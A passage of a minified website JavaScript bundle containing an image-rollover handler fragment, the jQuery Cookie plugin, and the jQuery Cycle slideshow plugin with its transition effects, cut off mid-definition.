          $(this).attr("src",oldSrc);
        }
        else if($(this).attr("src").indexOf("16_focus.gif#focus") != -1) {
          var oldSrc = $(this).attr("src").replace("16_focus.gif#focus","16.gif");
          $(this).attr("src",oldSrc);
        }
      }
    );
    $("a.ts_rollover").focus(
      function(){
        var tsIMG = $(this).children("img");
        if($(tsIMG).attr("src").indexOf("16_hover.gif#hover") != -1) {
          var newSrc = $(tsIMG).attr("src").replace("16_hover.gif#hover","16_focus.gif#focus");
          $(tsIMG).attr("src",newSrc);
        }
      }
    );
  });
}
;
/**
 * Cookie plugin
 *
 * Copyright (c) 2006 Klaus Hartl (stilbuero.de)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 */
jQuery.cookie=function(B,I,L){if(typeof I!="undefined"){L=L||{};if(I===null){I="";L.expires=-1}var E="";if(L.expires&&(typeof L.expires=="number"||L.expires.toUTCString)){var F;if(typeof L.expires=="number"){F=new Date();F.setTime(F.getTime()+(L.expires*24*60*60*1000))}else{F=L.expires}E="; expires="+F.toUTCString()}var K=L.path?"; path="+(L.path):"";var G=L.domain?"; domain="+(L.domain):"";var A=L.secure?"; secure":"";document.cookie=[B,"=",encodeURIComponent(I),E,K,G,A].join("")}else{var D=null;if(document.cookie&&document.cookie!=""){var J=document.cookie.split(";");for(var H=0;H<J.length;H++){var C=jQuery.trim(J[H]);if(C.substring(0,B.length+1)==(B+"=")){D=decodeURIComponent(C.substring(B.length+1));break}}}return D}};
;
/*
 * jQuery Cycle Plugin (with Transition Definitions)
 * Examples and documentation at: http://jquery.malsup.com/cycle/
 * Copyright (c) 2007-2010 M. Alsup
 * Version: 2.88 (08-JUN-2010)
 * Dual licensed under the MIT and GPL licenses.
 * http://jquery.malsup.com/license.html
 * Requires: jQuery v1.2.6 or later
 */
(function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero elements found by selector"+($.isReady?"":" (DOM not ready)"));return this;}return this.each(function(){var opts=handleArguments(this,options,arg2);if(opts===false){return;}opts.updateActivePagerLink=opts.updateActivePagerLink||$.fn.cycle.updateActivePagerLink;if(this.cycleTimeout){clearTimeout(this.cycleTimeout);}this.cycleTimeout=this.cyclePause=0;var $cont=$(this);var $slides=opts.slideExpr?$(opts.slideExpr,this):$cont.children();var els=$slides.get();if(els.length<2){log("terminating; too few slides: "+els.length);return;}var opts2=buildOptions($cont,$slides,els,opts,o);if(opts2===false){return;}var startTime=opts2.continuous?10:getTimeout(els[opts2.currSlide],els[opts2.nextSlide],opts2,!opts2.rev);if(startTime){startTime+=(opts2.delay||0);if(startTime<10){startTime=10;}debug("first timeout: "+startTime);this.cycleTimeout=setTimeout(function(){go(els,opts2,0,(!opts2.rev&&!opts.backwards));},startTime);}});};function handleArguments(cont,options,arg2){if(cont.cycleStop==undefined){cont.cycleStop=0;}if(options===undefined||options===null){options={};}if(options.constructor==String){switch(options){case"destroy":case"stop":var opts=$(cont).data("cycle.opts");if(!opts){return false;}cont.cycleStop++;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);}cont.cycleTimeout=0;$(cont).removeData("cycle.opts");if(options=="destroy"){destroy(opts);}return false;case"toggle":cont.cyclePause=(cont.cyclePause===1)?0:1;checkInstantResume(cont.cyclePause,arg2,cont);return false;case"pause":cont.cyclePause=1;return false;case"resume":cont.cyclePause=0;checkInstantResume(false,arg2,cont);return false;case"prev":case"next":var opts=$(cont).data("cycle.opts");if(!opts){log('options not found, "prev/next" ignored');return false;}$.fn.cycle[options](opts);return false;default:options={fx:options};}return options;}else{if(options.constructor==Number){var num=options;options=$(cont).data("cycle.opts");if(!options){log("options not found, can not advance slide");return false;}if(num<0||num>=options.elements.length){log("invalid slide index: "+num);return false;}options.nextSlide=num;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}if(typeof arg2=="string"){options.oneTimeFx=arg2;}go(options.elements,options,1,num>=options.currSlide);return false;}}return options;function checkInstantResume(isPaused,arg2,cont){if(!isPaused&&arg2===true){var options=$(cont).data("cycle.opts");if(!options){log("options not found, can not resume");return false;}if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}go(options.elements,options,1,(!opts.rev&&!opts.backwards));}}}function removeFilter(el,opts){if(!$.support.opacity&&opts.cleartype&&el.style.filter){try{el.style.removeAttribute("filter");}catch(smother){}}}function destroy(opts){if(opts.next){$(opts.next).unbind(opts.prevNextEvent);}if(opts.prev){$(opts.prev).unbind(opts.prevNextEvent);}if(opts.pager||opts.pagerAnchorBuilder){$.each(opts.pagerAnchors||[],function(){this.unbind().remove();});}opts.pagerAnchors=null;if(opts.destroy){opts.destroy(opts);}}function buildOptions($cont,$slides,els,options,o){var opts=$.extend({},$.fn.cycle.defaults,options||{},$.metadata?$cont.metadata():$.meta?$cont.data():{});if(opts.autostop){opts.countdown=opts.autostopCount||els.length;}var cont=$cont[0];$cont.data("cycle.opts",opts);opts.$cont=$cont;opts.stopCount=cont.cycleStop;opts.elements=els;opts.before=opts.before?[opts.before]:[];opts.after=opts.after?[opts.after]:[];opts.after.unshift(function(){opts.busy=0;});if(!$.support.opacity&&opts.cleartype){opts.after.push(function(){removeFilter(this,opts);});}if(opts.continuous){opts.after.push(function(){go(els,opts,0,(!opts.rev&&!opts.backwards));});}saveOriginalOpts(opts);if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($slides);}if($cont.css("position")=="static"){$cont.css("position","relative");}if(opts.width){$cont.width(opts.width);}if(opts.height&&opts.height!="auto"){$cont.height(opts.height);}if(opts.startingSlide){opts.startingSlide=parseInt(opts.startingSlide);}else{if(opts.backwards){opts.startingSlide=els.length-1;}}if(opts.random){opts.randomMap=[];for(var i=0;i<els.length;i++){opts.randomMap.push(i);}opts.randomMap.sort(function(a,b){return Math.random()-0.5;});opts.randomIndex=1;opts.startingSlide=opts.randomMap[1];}else{if(opts.startingSlide>=els.length){opts.startingSlide=0;}}opts.currSlide=opts.startingSlide||0;var first=opts.startingSlide;$slides.css({position:"absolute",top:0,left:0}).hide().each(function(i){var z;if(opts.backwards){z=first?i<=first?els.length+(i-first):first-i:els.length-i;}else{z=first?i>=first?els.length-(i-first):first-i:els.length-i;}$(this).css("z-index",z);});$(els[first]).css("opacity",1).show();removeFilter(els[first],opts);if(opts.fit&&opts.width){$slides.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}var reshape=opts.containerResize&&!$cont.innerHeight();if(reshape){var maxw=0,maxh=0;for(var j=0;j<els.length;j++){var $e=$(els[j]),e=$e[0],w=$e.outerWidth(),h=$e.outerHeight();if(!w){w=e.offsetWidth||e.width||$e.attr("width");}if(!h){h=e.offsetHeight||e.height||$e.attr("height");}maxw=w>maxw?w:maxw;maxh=h>maxh?h:maxh;}if(maxw>0&&maxh>0){$cont.css({width:maxw+"px",height:maxh+"px"});}}if(opts.pause){$cont.hover(function(){this.cyclePause++;},function(){this.cyclePause--;});}if(supportMultiTransitions(opts)===false){return false;}var requeue=false;options.requeueAttempts=options.requeueAttempts||0;$slides.each(function(){var $el=$(this);this.cycleH=(opts.fit&&opts.height)?opts.height:($el.height()||this.offsetHeight||this.height||$el.attr("height")||0);this.cycleW=(opts.fit&&opts.width)?opts.width:($el.width()||this.offsetWidth||this.width||$el.attr("width")||0);if($el.is("img")){var loadingIE=($.browser.msie&&this.cycleW==28&&this.cycleH==30&&!this.complete);var loadingFF=($.browser.mozilla&&this.cycleW==34&&this.cycleH==19&&!this.complete);var loadingOp=($.browser.opera&&((this.cycleW==42&&this.cycleH==19)||(this.cycleW==37&&this.cycleH==17))&&!this.complete);var loadingOther=(this.cycleH==0&&this.cycleW==0&&!this.complete);if(loadingIE||loadingFF||loadingOp||loadingOther){if(o.s&&opts.requeueOnImageNotLoaded&&++options.requeueAttempts<100){log(options.requeueAttempts," - img slide not loaded, requeuing slideshow: ",this.src,this.cycleW,this.cycleH);setTimeout(function(){$(o.s,o.c).cycle(options);},opts.requeueTimeout);requeue=true;return false;}else{log("could not determine size of image: "+this.src,this.cycleW,this.cycleH);}}}return true;});if(requeue){return false;}opts.cssBefore=opts.cssBefore||{};opts.animIn=opts.animIn||{};opts.animOut=opts.animOut||{};$slides.not(":eq("+first+")").css(opts.cssBefore);if(opts.cssFirst){$($slides[first]).css(opts.cssFirst);}if(opts.timeout){opts.timeout=parseInt(opts.timeout);if(opts.speed.constructor==String){opts.speed=$.fx.speeds[opts.speed]||parseInt(opts.speed);}if(!opts.sync){opts.speed=opts.speed/2;}var buffer=opts.fx=="shuffle"?500:250;while((opts.timeout-opts.speed)<buffer){opts.timeout+=opts.speed;}}if(opts.easing){opts.easeIn=opts.easeOut=opts.easing;}if(!opts.speedIn){opts.speedIn=opts.speed;}if(!opts.speedOut){opts.speedOut=opts.speed;}opts.slideCount=els.length;opts.currSlide=opts.lastSlide=first;if(opts.random){if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.backwards){opts.nextSlide=opts.startingSlide==0?(els.length-1):opts.startingSlide-1;}else{opts.nextSlide=opts.startingSlide>=(els.length-1)?0:opts.startingSlide+1;}}if(!opts.multiFx){var init=$.fn.cycle.transitions[opts.fx];if($.isFunction(init)){init($cont,$slides,opts);}else{if(opts.fx!="custom"&&!opts.multiFx){log("unknown transition: "+opts.fx,"; slideshow terminating");return false;}}}var e0=$slides[first];if(opts.before.length){opts.before[0].apply(e0,[e0,e0,opts,true]);}if(opts.after.length>1){opts.after[1].apply(e0,[e0,e0,opts,true]);}if(opts.next){$(opts.next).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?-1:1);});}if(opts.prev){$(opts.prev).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?1:-1);});}if(opts.pager||opts.pagerAnchorBuilder){buildPager(els,opts);}exposeAddSlide(opts,els);return opts;}function saveOriginalOpts(opts){opts.original={before:[],after:[]};opts.original.cssBefore=$.extend({},opts.cssBefore);opts.original.cssAfter=$.extend({},opts.cssAfter);opts.original.animIn=$.extend({},opts.animIn);opts.original.animOut=$.extend({},opts.animOut);$.each(opts.before,function(){opts.original.before.push(this);});$.each(opts.after,function(){opts.original.after.push(this);});}function supportMultiTransitions(opts){var i,tx,txs=$.fn.cycle.transitions;if(opts.fx.indexOf(",")>0){opts.multiFx=true;opts.fxs=opts.fx.replace(/\s*/g,"").split(",");for(i=0;i<opts.fxs.length;i++){var fx=opts.fxs[i];tx=txs[fx];if(!tx||!txs.hasOwnProperty(fx)||!$.isFunction(tx)){log("discarding unknown transition: ",fx);opts.fxs.splice(i,1);i--;}}if(!opts.fxs.length){log("No valid transitions named; slideshow terminating.");return false;}}else{if(opts.fx=="all"){opts.multiFx=true;opts.fxs=[];for(p in txs){tx=txs[p];if(txs.hasOwnProperty(p)&&$.isFunction(tx)){opts.fxs.push(p);}}}}if(opts.multiFx&&opts.randomizeEffects){var r1=Math.floor(Math.random()*20)+30;for(i=0;i<r1;i++){var r2=Math.floor(Math.random()*opts.fxs.length);opts.fxs.push(opts.fxs.splice(r2,1)[0]);}debug("randomized fx sequence: ",opts.fxs);}return true;}function exposeAddSlide(opts,els){opts.addSlide=function(newSlide,prepend){var $s=$(newSlide),s=$s[0];if(!opts.autostopCount){opts.countdown++;}els[prepend?"unshift":"push"](s);if(opts.els){opts.els[prepend?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute");$s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opts.nextSlide++;}if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($s);}if(opts.fit&&opts.width){$s.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}s.cycleH=(opts.fit&&opts.height)?opts.height:$s.height();s.cycleW=(opts.fit&&opts.width)?opts.width:$s.width();$s.css(opts.cssBefore);if(opts.pager||opts.pagerAnchorBuilder){$.fn.cycle.createPagerAnchor(els.length-1,s,$(opts.pager),els,opts);}if($.isFunction(opts.onAddSlide)){opts.onAddSlide($s);}else{$s.hide();}};}$.fn.cycle.resetState=function(opts,fx){fx=fx||opts.fx;opts.before=[];opts.after=[];opts.cssBefore=$.extend({},opts.original.cssBefore);opts.cssAfter=$.extend({},opts.original.cssAfter);opts.animIn=$.extend({},opts.original.animIn);opts.animOut=$.extend({},opts.original.animOut);opts.fxFn=null;$.each(opts.original.before,function(){opts.before.push(this);});$.each(opts.original.after,function(){opts.after.push(this);});var init=$.fn.cycle.transitions[fx];if($.isFunction(init)){init(opts.$cont,$(opts.elements),opts);}};function go(els,opts,manual,fwd){if(manual&&opts.busy&&opts.manualTrump){debug("manualTrump in go(), stopping active transition");$(els).stop(true,true);opts.busy=false;}if(opts.busy){debug("transition active, ignoring new tx request");return;}var p=opts.$cont[0],curr=els[opts.currSlide],next=els[opts.nextSlide];if(p.cycleStop!=opts.stopCount||p.cycleTimeout===0&&!manual){return;}if(!manual&&!p.cyclePause&&!opts.bounce&&((opts.autostop&&(--opts.countdown<=0))||(opts.nowrap&&!opts.random&&opts.nextSlide<opts.currSlide))){if(opts.end){opts.end(opts);}return;}var changed=false;if((manual||!p.cyclePause)&&(opts.nextSlide!=opts.currSlide)){changed=true;var fx=opts.fx;curr.cycleH=curr.cycleH||$(curr).height();curr.cycleW=curr.cycleW||$(curr).width();next.cycleH=next.cycleH||$(next).height();next.cycleW=next.cycleW||$(next).width();if(opts.multiFx){if(opts.lastFx==undefined||++opts.lastFx>=opts.fxs.length){opts.lastFx=0;}fx=opts.fxs[opts.lastFx];opts.currFx=fx;}if(opts.oneTimeFx){fx=opts.oneTimeFx;opts.oneTimeFx=null;}$.fn.cycle.resetState(opts,fx);if(opts.before.length){$.each(opts.before,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});}var after=function(){$.each(opts.after,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});};debug("tx firing; currSlide: "+opts.currSlide+"; nextSlide: "+opts.nextSlide);opts.busy=1;if(opts.fxFn){opts.fxFn(curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}else{if($.isFunction($.fn.cycle[opts.fx])){$.fn.cycle[opts.fx](curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}else{$.fn.cycle.custom(curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}}}if(changed||opts.nextSlide==opts.currSlide){opts.lastSlide=opts.currSlide;if(opts.random){opts.currSlide=opts.nextSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];if(opts.nextSlide==opts.currSlide){opts.nextSlide=(opts.currSlide==opts.slideCount-1)?0:opts.currSlide+1;}}else{if(opts.backwards){var roll=(opts.nextSlide-1)<0;if(roll&&opts.bounce){opts.backwards=!opts.backwards;opts.nextSlide=1;opts.currSlide=0;}else{opts.nextSlide=roll?(els.length-1):opts.nextSlide-1;opts.currSlide=roll?0:opts.nextSlide+1;}}else{var roll=(opts.nextSlide+1)==els.length;if(roll&&opts.bounce){opts.backwards=!opts.backwards;opts.nextSlide=els.length-2;opts.currSlide=els.length-1;}else{opts.nextSlide=roll?0:opts.nextSlide+1;opts.currSlide=roll?els.length-1:opts.nextSlide-1;}}}}if(changed&&opts.pager){opts.updateActivePagerLink(opts.pager,opts.currSlide,opts.activePagerClass);}var ms=0;if(opts.timeout&&!opts.continuous){ms=getTimeout(els[opts.currSlide],els[opts.nextSlide],opts,fwd);}else{if(opts.continuous&&p.cyclePause){ms=10;}}if(ms>0){p.cycleTimeout=setTimeout(function(){go(els,opts,0,(!opts.rev&&!opts.backwards));},ms);}}$.fn.cycle.updateActivePagerLink=function(pager,currSlide,clsName){$(pager).each(function(){$(this).children().removeClass(clsName).eq(currSlide).addClass(clsName);});};function getTimeout(curr,next,opts,fwd){if(opts.timeoutFn){var t=opts.timeoutFn.call(curr,curr,next,opts,fwd);while((t-opts.speed)<250){t+=opts.speed;}debug("calculated timeout: "+t+"; speed: "+opts.speed);if(t!==false){return t;}}return opts.timeout;}$.fn.cycle.next=function(opts){advance(opts,opts.rev?-1:1);};$.fn.cycle.prev=function(opts){advance(opts,opts.rev?1:-1);};function advance(opts,val){var els=opts.elements;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if(opts.random&&val<0){opts.randomIndex--;if(--opts.randomIndex==-2){opts.randomIndex=els.length-2;}else{if(opts.randomIndex==-1){opts.randomIndex=els.length-1;}}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.random){opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.currSlide+val;if(opts.nextSlide<0){if(opts.nowrap){return false;}opts.nextSlide=els.length-1;}else{if(opts.nextSlide>=els.length){if(opts.nowrap){return false;}opts.nextSlide=0;}}}}var cb=opts.onPrevNextEvent||opts.prevNextClick;if($.isFunction(cb)){cb(val>0,opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,val>=0);return false;}function buildPager(els,opts){var $p=$(opts.pager);$.each(els,function(i,o){$.fn.cycle.createPagerAnchor(i,o,$p,els,opts);});opts.updateActivePagerLink(opts.pager,opts.startingSlide,opts.activePagerClass);}$.fn.cycle.createPagerAnchor=function(i,el,$p,els,opts){var a;if($.isFunction(opts.pagerAnchorBuilder)){a=opts.pagerAnchorBuilder(i,el);debug("pagerAnchorBuilder("+i+", el) returned: "+a);}else{a='<a href="#">'+(i+1)+"</a>";}if(!a){return;}var $a=$(a);if($a.parents("body").length===0){var arr=[];if($p.length>1){$p.each(function(){var $clone=$a.clone(true);$(this).append($clone);arr.push($clone[0]);});$a=$(arr);}else{$a.appendTo($p);}}opts.pagerAnchors=opts.pagerAnchors||[];opts.pagerAnchors.push($a);$a.bind(opts.pagerEvent,function(e){e.preventDefault();opts.nextSlide=i;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}var cb=opts.onPagerEvent||opts.pagerClick;if($.isFunction(cb)){cb(opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,opts.currSlide<i);});if(!/^click/.test(opts.pagerEvent)&&!opts.allowPagerClickBubble){$a.bind("click.cycle",function(){return false;});}if(opts.pauseOnPagerHover){$a.hover(function(){opts.$cont[0].cyclePause++;},function(){opts.$cont[0].cyclePause--;});}};$.fn.cycle.hopsFromLast=function(opts,fwd){var hops,l=opts.lastSlide,c=opts.currSlide;if(fwd){hops=c>l?c-l:opts.slideCount-l;}else{hops=c<l?l-c:l+opts.slideCount-c;}return hops;};function clearTypeFix($slides){debug("applying clearType background-color hack");function hex(s){s=parseInt(s).toString(16);return s.length<2?"0"+s:s;}function getBg(e){for(;e&&e.nodeName.toLowerCase()!="html";e=e.parentNode){var v=$.css(e,"background-color");if(v.indexOf("rgb")>=0){var rgb=v.match(/\d+/g);return"#"+hex(rgb[0])+hex(rgb[1])+hex(rgb[2]);}if(v&&v!="transparent"){return v;}}return"#ffffff";}$slides.each(function(){$(this).css("background-color",getBg(this));});}$.fn.cycle.commonReset=function(curr,next,opts,w,h,rev){$(opts.elements).not(curr).hide();opts.cssBefore.opacity=1;opts.cssBefore.display="block";if(w!==false&&next.cycleW>0){opts.cssBefore.width=next.cycleW;}if(h!==false&&next.cycleH>0){opts.cssBefore.height=next.cycleH;}opts.cssAfter=opts.cssAfter||{};opts.cssAfter.display="none";$(curr).css("zIndex",opts.slideCount+(rev===true?1:0));$(next).css("zIndex",opts.slideCount+(rev===true?0:1));};$.fn.cycle.custom=function(curr,next,opts,cb,fwd,speedOverride){var $l=$(curr),$n=$(next);var speedIn=opts.speedIn,speedOut=opts.speedOut,easeIn=opts.easeIn,easeOut=opts.easeOut;$n.css(opts.cssBefore);if(speedOverride){if(typeof speedOverride=="number"){speedIn=speedOut=speedOverride;}else{speedIn=speedOut=1;}easeIn=easeOut=null;}var fn=function(){$n.animate(opts.animIn,speedIn,easeIn,cb);};$l.animate(opts.animOut,speedOut,easeOut,function(){if(opts.cssAfter){$l.css(opts.cssAfter);}if(!opts.sync){fn();}});if(opts.sync){fn();}};$.fn.cycle.transitions={fade:function($cont,$slides,opts){$slides.not(":eq("+opts.currSlide+")").css("opacity",0);opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.opacity=0;});opts.animIn={opacity:1};opts.animOut={opacity:0};opts.cssBefore={top:0,left:0};}};$.fn.cycle.ver=function(){return ver;};$.fn.cycle.defaults={fx:"fade",timeout:4000,timeoutFn:null,continuous:0,speed:1000,speedIn:null,speedOut:null,next:null,prev:null,onPrevNextEvent:null,prevNextEvent:"click.cycle",pager:null,onPagerEvent:null,pagerEvent:"click.cycle",allowPagerClickBubble:false,pagerAnchorBuilder:null,before:null,after:null,end:null,easing:null,easeIn:null,easeOut:null,shuffle:null,animIn:null,animOut:null,cssBefore:null,cssAfter:null,fxFn:null,height:"auto",startingSlide:0,sync:1,random:0,fit:0,containerResize:1,pause:0,pauseOnPagerHover:0,autostop:0,autostopCount:0,delay:0,slideExpr:null,cleartype:!$.support.opacity,cleartypeNoBg:false,nowrap:0,fastOnEvent:0,randomizeEffects:1,rev:0,manualTrump:true,requeueOnImageNotLoaded:true,requeueTimeout:250,activePagerClass:"activeSlide",updateActivePagerLink:null,backwards:false};})(jQuery);
/*
 * jQuery Cycle Plugin Transition Definitions
 * This script is a plugin for the jQuery Cycle Plugin
 * Examples and documentation at: http://malsup.com/jquery/cycle/
 * Copyright (c) 2007-2010 M. Alsup
 * Version:	 2.72
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 */
(function($){$.fn.cycle.transitions.none=function($cont,$slides,opts){opts.fxFn=function(curr,next,opts,after){$(next).show();$(curr).hide();after();};};$.fn.cycle.transitions.scrollUp=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssBefore={top:h,left:0};opts.cssFirst={top:0};opts.animIn={top:0};opts.animOut={top:-h};};$.fn.cycle.transitions.scrollDown=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssFirst={top:0};opts.cssBefore={top:-h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.scrollLeft=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:0-w};};$.fn.cycle.transitions.scrollRight=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:-w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.scrollHorz=function($cont,$slides,opts){$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.left=fwd?(next.cycleW-1):(1-next.cycleW);opts.animOut.left=fwd?-curr.cycleW:curr.cycleW;});opts.cssFirst={left:0};opts.cssBefore={top:0};opts.animIn={left:0};opts.animOut={top:0};};$.fn.cycle.transitions.scrollVert=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.top=fwd?(1-next.cycleH):(next.cycleH-1);opts.animOut.top=fwd?curr.cycleH:-curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0};opts.animIn={top:0};opts.animOut={left:0};};$.fn.cycle.transitions.slideX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;});opts.cssBefore={left:0,top:0,width:0};opts.animIn={width:"show"};opts.animOut={width:0};};$.fn.cycle.transitions.slideY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;});opts.cssBefore={left:0,top:0,height:0};opts.animIn={height:"show"};opts.animOut={height:0};};$.fn.cycle.transitions.shuffle=function($cont,$slides,opts){var i,w=$cont.css("overflow","visible").width();$slides.css({left:0,top:0});opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);});if(!opts.speedAdjusted){opts.speed=opts.speed/2;opts.speedAdjusted=true;}opts.random=0;opts.shuffle=opts.shuffle||{left:-w,top:15};opts.els=[];for(i=0;i<$slides.length;i++){opts.els.push($slides[i]);}for(i=0;i<opts.currSlide;i++){opts.els.push(opts.els.shift());}opts.fxFn=function(curr,next,opts,cb,fwd){var $el=fwd?$(curr):$(next);$(next).css(opts.cssBefore);var count=opts.slideCount;$el.animate(opts.shuffle,opts.speedIn,opts.easeIn,function(){var hops=$.fn.cycle.hopsFromLast(opts,fwd);for(var k=0;k<hops;k++){fwd?opts.els.push(opts.els.shift()):opts.els.unshift(opts.els.pop());}if(fwd){for(var i=0,len=opts.els.length;i<len;i++){$(opts.els[i]).css("z-index",len-i+count);}}else{var z=$(curr).css("z-index");$el.css("z-index",parseInt(z)+1+count);}$el.animate({left:0,top:0},opts.speedOut,opts.easeOut,function(){$(fwd?this:curr).hide();if(cb){cb();}});});};opts.cssBefore={display:"block",opacity:1,top:0,left:0};};$.fn.cycle.transitions.turnUp=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=next.cycleH;opts.animIn.height=next.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,height:0};opts.animIn={top:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnDown=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,top:0,height:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnLeft=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=next.cycleW;opts.animIn.width=next.cycleW;});opts.cssBefore={top:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.turnRight=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={top:0,left:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.zoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false,true);opts.cssBefore.top=next.cycleH/2;opts.cssBefore.left=next.cycleW/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};opts.animOut={width:0,height:0,top:curr.cycleH/2,left:curr.cycleW/2};});opts.cssFirst={top:0,left:0};opts.cssBefore={width:0,height:0};};$.fn.cycle.transitions.fadeZoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false);opts.cssBefore.left=next.cycleW/2;opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};});opts.cssBefore={width:0,height:0};opts.animOut={opacity:0};};$.fn.cycle.transitions.blindX=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.blindY=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.blindZ=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();var 